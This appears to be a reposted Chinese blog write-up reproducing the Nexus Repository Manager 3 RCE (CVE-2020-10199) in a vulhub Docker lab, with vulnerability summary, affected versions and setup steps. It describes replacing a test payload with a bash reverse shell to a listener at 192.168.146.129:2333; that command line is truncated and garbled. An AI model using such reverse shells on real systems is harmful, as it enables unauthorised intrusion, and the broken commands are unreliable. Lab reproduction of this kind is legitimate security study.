Nexus Repository Manager 3远程命令
执行漏洞(CVE-2020-10199)再现
一、漏洞摘要
2020年3月31日,Sonatype正式发布了安全公告,修正了NexusRepository Manager 3中存在的远程代码执行漏洞CVE-2020-10199。
Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。
在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当,导致经过授权认证的攻击者,可以在远程通过构造恶意的
HTTP 请求,在服务端执行任意恶意代码,获取系统权限。
此漏洞的利用需要攻击者具备任意类型的账号权限。
影响版本
Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
1、环境搭建
使用 vulhub提供的漏洞环境(linux环境,安装docker下,执行docker-composeup -d 命令启动 Nexus Repository Manager 3.21.1)
等待一段时间环境才能成功启动,访问 http://your-ip:8081即可看到Web页面。
该漏洞需要至少普通用户身份,所以我们需要使用账号密码 admin:admin登
录后台。
执行如下命令启动 Nexus Repository Manager 3.21.1:
docker-compose up -d
创建环境成功
可以看到页面是下面这样的
现在我们来进行漏洞测试
发包
说明有漏洞
Docker exec -i id bash 进入 docker
查看到文件创建成功
怎么反弹 shell 呢?
将 touch /tmp/success 替换成 bash -i >& /dev/tc;&1
然后我们在 192.168.146.129 监听 2333端口
发包
可以看到 shell 反弹成功
以上
探讨渗透测试及黑客技术,请关注并私信我。#小白入行网络安全# #安界网人才培养计划#
1.《Nexus Repository Manager 3 RCE漏洞(CVE-2020-10199)复现》援引自互联网,旨在传递更多网络信息知识,仅代表作者本人观点,与本网站无关,侵删请联系页脚下方联系方式。
2.《Nexus Repository Manager 3 RCE漏洞(CVE-2020-10199)复现》仅供读者参考,本网站未对该内容进行证实,对其原创性、真实性、完整性、及时性不作任何保证。
3.文章转载时请保留本站内容来源地址,https://www.cxvn.com/gl/djyxgl/208908.html